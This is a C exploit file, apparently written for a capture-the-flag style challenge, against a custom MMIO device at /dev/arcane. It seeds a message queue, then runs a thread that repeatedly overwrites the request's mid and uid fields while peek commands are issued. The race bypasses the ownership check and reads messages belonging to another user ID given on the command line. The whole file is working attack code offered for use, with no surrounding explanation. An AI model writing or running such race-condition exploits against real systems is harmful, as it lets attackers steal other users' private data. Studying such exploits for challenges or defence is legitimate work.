exploits/ArcaneLink/exploit_race_cond.c

#include <err.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <inttypes.h>
#include <sys/mman.h>
#include <pthread.h>

#define DEV_NAME "/dev/arcane"

#define CMD_PEEK_MSG 0x00
#define CMD_PUSH_MSG 0x01
#define CMD_POP_MSG 0x02
#define CMD_GEN_KEY 0x03

#define STATUS_OK    0x00000000
#define STATUS_BUSY  0x01000000
#define STATUS_ERROR 0x02000000

#define ERR_ENOMSG ((uint32_t)0x09)

/*
	Used to talk with the mmio device
*/
#define MSG_SZ 0x100

typedef struct __attribute__((packed)) guest_req {
	uint32_t status;
	uint32_t cmd;
	uint32_t mid;
	uint32_t uid;
	uint64_t key;
	char buf[MSG_SZ];
} guest_req_t;

static uint32_t target_uid;
static uint32_t target_msg_idx;

static void *th(void *arg) {
	volatile guest_req_t *req = (volatile guest_req_t *)arg;
	puts("[thread] started");

	while (1) {
		*(volatile uint64_t *)&(req->mid) = ((uint64_t)target_uid) << 32 | target_msg_idx;
	}

	return NULL;
}

static void fill_msgqueue(volatile guest_req_t *req) {
	uint32_t status;

	// Already have req->key set
	req->mid = 63;
	req->uid = getuid();
	req->cmd = CMD_PEEK_MSG;
	while ((status = req->status) == STATUS_BUSY) usleep(100);

	// Already filled up by a previous run
	if (status == STATUS_OK)
		return;

	req->mid = 123;
	strcpy((void *)req->buf, "PWN");

	for (unsigned i = 0; i < 64; i++) {
		req->cmd = CMD_PUSH_MSG;
		while ((status = req->status) == STATUS_BUSY) usleep(100);

		if (status != STATUS_OK) {
			printf("[exploit] cmd push failed: 0x%" PRIx32 "\n", status);
			exit(1);
		}
	}
}

int main(int argc, char **argv) {
	bool success = false;
	volatile guest_req_t *req;
	uint32_t my_uid, status, end_idx;
	uint64_t my_key;
	pthread_t thread;
	int fd;

	if (argc < 2) {
		errx(1, "usage: %s uid [msg_idx]\n"
			"\tuid: uid to steal msg from\n"
			"\tmsg_idx: idx of msg to steal",
			argv[0]
		);
	}

	// Open /dev/arcane and mmap our mmio page
	if ((fd = open(DEV_NAME, O_RDWR)) < 0)
		err(1, "open " DEV_NAME);

	req = (guest_req_t *)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
	if (req == MAP_FAILED)
		err(1, "mmap");

	target_uid = atoi(argv[1]);
	printf("[exploit] target uid: %" PRIu32 "\n", target_uid);

	if (argc == 3) {
		target_msg_idx = end_idx = atoi(argv[2]);
		printf("[exploit] target msg idx: %" PRIu32 "\n", target_msg_idx);
	} else {
		target_msg_idx = 0;
		end_idx = 63; // there can be at most 64 msgs
		printf("[exploit] no msg idx given, scanning all msgs\n");
	}

	/*
		Generate a key for our uid
	*/
	req->cmd = CMD_GEN_KEY;
	while ((status = req->status) == STATUS_BUSY) usleep(100);
	my_key = req->key;

	if (status != STATUS_OK) {
		printf("[exploit] cmd gen key failed: 0x%" PRIx32 "\n", status);
		return 1;
	}

	printf("[exploit] got key: 0x%" PRIx64 "\n", my_key);

	// Fill the message queue with known messages so that we can distinghush
	// whether we successfully stolen a message or not later
	fill_msgqueue(req);

	// Start race thread
	pthread_create(&thread, NULL, th, (void*)req);

	/*
		Peek messages one at a time with the race condition
	*/
	my_uid = getuid();
	req->key = my_key;
	req->mid = 0;

	for (; target_msg_idx <= end_idx; target_msg_idx++) {
		size_t attempts;

		for (attempts = 1; ; attempts++) {
			req->uid = my_uid;
			req->cmd = CMD_PEEK_MSG;
			while ((status = req->status) == STATUS_BUSY) usleep(10);

			if ((status & 0xff000000) == STATUS_ERROR && (status & 0xffffff) == ERR_ENOMSG)
				goto no_more_msgs;

			if ((status & 0xff000000) == STATUS_OK) {
				// If we peek something other than the previously pushed msg,
				// we just stole a msg that is not ours
				if (strcmp((char *)req->buf, "PWN"))
					break;
			}
		}

		printf("[exploit] stolen msg at idx %" PRIu32 " (%" PRIu64 " attempts): %s\n", target_msg_idx, attempts, req->buf);
		success = true;
	}

no_more_msgs:
	if (!success) {
		puts("[exploit] no msgs found");
		return 1;
	}

	return 0;
}